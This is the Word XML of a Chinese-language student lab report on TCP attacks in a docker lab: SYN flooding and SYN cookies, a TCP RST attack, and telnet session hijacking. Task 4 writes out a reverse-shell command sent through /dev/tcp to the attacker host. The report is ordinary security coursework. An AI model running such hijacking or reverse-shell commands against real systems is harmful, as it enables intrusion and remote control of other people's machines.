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2726C" w14:textId="1D775B86" w:rsidR="00971A38" w:rsidRPr="00971A38" w:rsidRDefault="00971A38">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00971A38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00971A38">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7118110 </w:t>
      </w:r>
      <w:r w:rsidRPr="00971A38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>杨紫瑄</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F32258F" w14:textId="19715E7C" w:rsidR="00CB2E48" w:rsidRPr="00CF68CA" w:rsidRDefault="00CF68CA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF68CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF68CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ask</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF68CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D097C2E" w14:textId="6D239F21" w:rsidR="00CF68CA" w:rsidRDefault="00CF68CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BED0032" wp14:editId="5C4CDB8B">
            <wp:extent cx="5274310" cy="725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B618" w14:textId="6AF512D8" w:rsidR="00CF68CA" w:rsidRPr="00CF68CA" w:rsidRDefault="00CF68CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF68CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>未开始攻击时，查看被攻击主机状态发现只有两个listen状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E0E66C" w14:textId="7275147E" w:rsidR="00CF68CA" w:rsidRDefault="00CF68CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="221A7D5A" wp14:editId="31DA11DE">
            <wp:extent cx="2903220" cy="2486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543" cy="2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24C8" w14:textId="2031FC7D" w:rsidR="00CF68CA" w:rsidRPr="00CF68CA" w:rsidRDefault="00CF68CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF68CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>在主机中运行syn</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF68CA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flood.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B00214" w14:textId="6BA2A92A" w:rsidR="00CF68CA" w:rsidRDefault="00CF68CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48704B28" wp14:editId="4DCA7977">
            <wp:extent cx="381762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899" cy="2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8F6A" w14:textId="179DBA10" w:rsidR="00CF68CA" w:rsidRPr="00CF68CA" w:rsidRDefault="00CF68CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF68CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>并在attacker的docker下进行</w:t>
      </w:r>
      <w:r w:rsidR="0089608D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="0089608D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>YN</w:t>
      </w:r>
      <w:r w:rsidR="0089608D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>泛洪</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF68CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3E734B" w14:textId="6C1311CD" w:rsidR="00CF68CA" w:rsidRDefault="00CF68CA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2A4FC65" wp14:editId="48B4DC31">
            <wp:extent cx="5274310" cy="2569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CEC0" w14:textId="772AAAAA" w:rsidR="00CF68CA" w:rsidRPr="00CF68CA" w:rsidRDefault="00CF68C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在被攻击的主机中再次查看tcp状态发现出现大量S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>YN_RECV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>状态，表示已被S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>YN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>泛洪攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3036B960" w14:textId="762ACAAE" w:rsidR="00CF68CA" w:rsidRDefault="00C50848">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62AE77CF" wp14:editId="0BA70C40">
            <wp:extent cx="5274310" cy="1529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18D3" w14:textId="453A75E6" w:rsidR="00CF68CA" w:rsidRDefault="00CF68C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在另一台主机中telnet被攻击者主机发现无法连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC9C6ED" w14:textId="21D0D426" w:rsidR="00CF68CA" w:rsidRDefault="00C77A68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EF67F6D" wp14:editId="22012ABA">
            <wp:extent cx="3619500" cy="12044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996" cy="12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8095" w14:textId="537D9249" w:rsidR="00C77A68" w:rsidRDefault="007F7D8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停止泛洪攻击后再次在另一台主机中telnet被攻击主机的地址，发现连接成功</w:t>
      </w:r>
      <w:r w:rsidR="00852F5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，说明被攻击的主机记住了以前成功的连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515C9A89" w14:textId="4AD3D330" w:rsidR="00C50848" w:rsidRDefault="00852F5A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B336240" wp14:editId="4427ED9F">
            <wp:extent cx="5274310" cy="293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BDE4" w14:textId="5B4D694F" w:rsidR="00852F5A" w:rsidRDefault="00852F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可以查看到连接的记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CDEDBD" w14:textId="32096ADB" w:rsidR="00852F5A" w:rsidRDefault="00852F5A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D2A869E" wp14:editId="65CE2FB7">
            <wp:extent cx="3462411" cy="167640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122" cy="16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1233" w14:textId="007DC39E" w:rsidR="00852F5A" w:rsidRDefault="0038494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3C63194" wp14:editId="7B3814E3">
            <wp:extent cx="5274310" cy="5353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A0E5" w14:textId="513ECD21" w:rsidR="00852F5A" w:rsidRDefault="00852F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当清除记录后再次在泛洪攻击下使用另一主机Telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.9.0.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>发现再次无法连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71503B02" w14:textId="4F24011D" w:rsidR="00384943" w:rsidRDefault="0038494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ADB1BC8" wp14:editId="75BDD533">
            <wp:extent cx="3656210" cy="1348740"/>
            <wp:effectExtent l="0" t="0" r="19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546" cy="13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851C" w14:textId="27A421F5" w:rsidR="00384943" w:rsidRDefault="0038494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将docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-compose.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>文件中victim的net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.ipv4.tcp_syncookies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>设为1，也就是启用S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">YN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cookie机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB78A2C" w14:textId="64D90D08" w:rsidR="00BC003C" w:rsidRDefault="00BC003C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5D5D27B" wp14:editId="3C999D5C">
            <wp:extent cx="5274310" cy="25793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3F1E" w14:textId="3C20A354" w:rsidR="00384943" w:rsidRDefault="0038494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CC3772B" wp14:editId="2DA2082E">
            <wp:extent cx="3593930" cy="1135380"/>
            <wp:effectExtent l="0" t="0" r="698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538" cy="11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A675" w14:textId="7BDC6928" w:rsidR="00384943" w:rsidRDefault="0038494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重启容器后，在泛洪攻击下的另一主机Telnet被攻击主机连接成功，说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cookie机制成功抵抗了泛洪攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BB2A07" w14:textId="77777777" w:rsidR="0025650D" w:rsidRDefault="0025650D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385BD6FF" w14:textId="35B3CDAB" w:rsidR="00BE4716" w:rsidRPr="00BE4716" w:rsidRDefault="00BE4716">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE4716">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE4716">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE5F6DB" w14:textId="0D3896D0" w:rsidR="00BE4716" w:rsidRDefault="00B93C82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EFE60A2" wp14:editId="49D5AB93">
            <wp:extent cx="5274310" cy="18916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3A71" w14:textId="5232E51C" w:rsidR="00745A68" w:rsidRDefault="006776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在主机1中telnet被攻击主机</w:t>
      </w:r>
      <w:r w:rsidR="003C1D4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>并使用wireshark抓取数据包，选择最后一个telnet报文观察，</w:t>
      </w:r>
      <w:r w:rsidR="00CB7B45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>如上图，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>源地址为1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0.9.0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，目的地址为1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0.9.0.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，源端口为2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，目的端口为4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00745A68">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>226</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，下一个seq值为</w:t>
      </w:r>
      <w:r w:rsidR="00745A68" w:rsidRPr="00745A68">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1033768486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ack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>值为</w:t>
      </w:r>
      <w:r w:rsidR="00745A68" w:rsidRPr="00745A68">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>413828779</w:t>
      </w:r>
      <w:r w:rsidR="00745A68"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，构造</w:t>
      </w:r>
      <w:r w:rsidR="00CB7B45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻击数据包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A95996" w14:textId="4341FC46" w:rsidR="00745A68" w:rsidRDefault="00745A68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667D56AB" wp14:editId="1727EDEA">
            <wp:extent cx="5274310" cy="11131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CF43" w14:textId="5ED36246" w:rsidR="00CB7B45" w:rsidRDefault="00CB7B4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在攻击者主机中执行代码后发现telnet连接被中断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48991C8A" w14:textId="6E6E0905" w:rsidR="00B93C82" w:rsidRDefault="00745A68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5A8844C" wp14:editId="7DF412EB">
            <wp:extent cx="5274310" cy="2070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ECBF" w14:textId="4003957C" w:rsidR="00CB7B45" w:rsidRDefault="00CB7B45">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10320A19" w14:textId="40B8A699" w:rsidR="00CB7B45" w:rsidRPr="00CB7B45" w:rsidRDefault="00CB7B45">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB7B45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB7B45">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DC1DE2" w14:textId="527E70AD" w:rsidR="00CB7B45" w:rsidRDefault="004A6DDA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7B57F61" wp14:editId="6D1C9B30">
            <wp:extent cx="5274310" cy="1883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07DE" w14:textId="42397A0F" w:rsidR="00CC2779" w:rsidRDefault="00CC277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与task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相似，在主机1中telnet被攻击主机地址，并用wireshark抓取数据包，观察最后一个t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>elnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>报文如上图，并构造代码如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C5CAE" w14:textId="16AED843" w:rsidR="00932D26" w:rsidRDefault="00932D26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2DAAE3F5" wp14:editId="05A143B3">
            <wp:extent cx="5274310" cy="14351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3896" w14:textId="1A8D95A1" w:rsidR="00932D26" w:rsidRDefault="00932D2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其中，与抓取所得数据包相比，源地址与目的地址交换，分别为1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0.9.0.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>与1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0.9.0.5</w:t>
      </w:r>
      <w:r w:rsidR="003E3B37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>源端口与目标端口交换，分别为4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4294</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>与2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="003E3B37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>seq值为数据包中ack值，为1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>490632150</w:t>
      </w:r>
      <w:r w:rsidR="003E3B37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ack值为数据包中下一个seq值，为8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>27483017</w:t>
      </w:r>
      <w:r w:rsidR="003E3B37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>data设置成touch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lastRenderedPageBreak/>
        <w:t>a.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>命令，最后通过观察被攻击主机中是否生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>文件判断是否成功攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5E9F28" w14:textId="54FE5A41" w:rsidR="00932D26" w:rsidRDefault="00932D26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641AEBC" wp14:editId="3ADF566B">
            <wp:extent cx="2324100" cy="3645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6036" cy="3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5C69" w14:textId="1B230928" w:rsidR="00932D26" w:rsidRDefault="00932D2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发现成功生成a.txt文件，说明T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>会话被成功劫持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2308EB" w14:textId="1D19DA7E" w:rsidR="00160E66" w:rsidRDefault="00160E66">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03DFD351" w14:textId="06582C5C" w:rsidR="00160E66" w:rsidRPr="00160E66" w:rsidRDefault="00160E66">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160E66">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidRPr="00160E66">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAA7F30" w14:textId="56289440" w:rsidR="00160E66" w:rsidRDefault="002648EB" w:rsidP="002648EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="72"/>
        </w:tabs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与task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相似，在主机1上telnet被攻击主机地址并用wireshark抓取数据包，选择最后一个telnet报文观察</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFA7273" w14:textId="6DCC4678" w:rsidR="002648EB" w:rsidRDefault="002648EB" w:rsidP="002648EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="72"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6118CC2A" wp14:editId="1D260517">
            <wp:extent cx="5274310" cy="24714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6706" w14:textId="5E4BDC9B" w:rsidR="002648EB" w:rsidRDefault="002648EB" w:rsidP="002648EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="72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根据数据包中数据，与task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中</w:t>
      </w:r>
      <w:r w:rsidR="00846F91">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>构造方法相同构造下列代码，其中需将data改为</w:t>
      </w:r>
      <w:r w:rsidR="00846F91" w:rsidRPr="00846F91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;</w:t>
      </w:r>
      <w:r w:rsidR="00846F91">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092C4BDA" w14:textId="645C3CA6" w:rsidR="002648EB" w:rsidRDefault="002648EB" w:rsidP="002648EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="72"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B983CFA" wp14:editId="66573EF4">
            <wp:extent cx="5274310" cy="13887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956E" w14:textId="09593910" w:rsidR="0097247C" w:rsidRDefault="0097247C" w:rsidP="002648EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="72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打开两个attacker的docker终端，一个用于监听端口，一个用于发送反弹shell的程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7B3DA9" w14:textId="3EEECF30" w:rsidR="002648EB" w:rsidRDefault="002648EB" w:rsidP="002648EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="72"/>
        </w:tabs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CF2B226" wp14:editId="1B1BD2DE">
            <wp:extent cx="2728264" cy="3276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8191" cy="3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3D00" w14:textId="0093E218" w:rsidR="0097247C" w:rsidRDefault="0097247C" w:rsidP="002648EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="72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首先打开一个attacker的docker终端执行语句监听端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6E37BB" w14:textId="3B101A7F" w:rsidR="002648EB" w:rsidRDefault="002648EB" w:rsidP="002648EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="72"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BF65210" wp14:editId="03F6815D">
            <wp:extent cx="3345180" cy="740327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5217" cy="74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5027" w14:textId="5E1B7830" w:rsidR="0097247C" w:rsidRPr="00CF68CA" w:rsidRDefault="0097247C" w:rsidP="002648EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="72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在另一个终端执行攻击程序后发现第一个打开的终端监听成功</w:t>
      </w:r>
      <w:r w:rsidR="00D1288D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，攻击者获取了被攻击主机的shell，此时就可以在attacker主机上对被攻击主机进行操作了</w:t>
      </w:r>
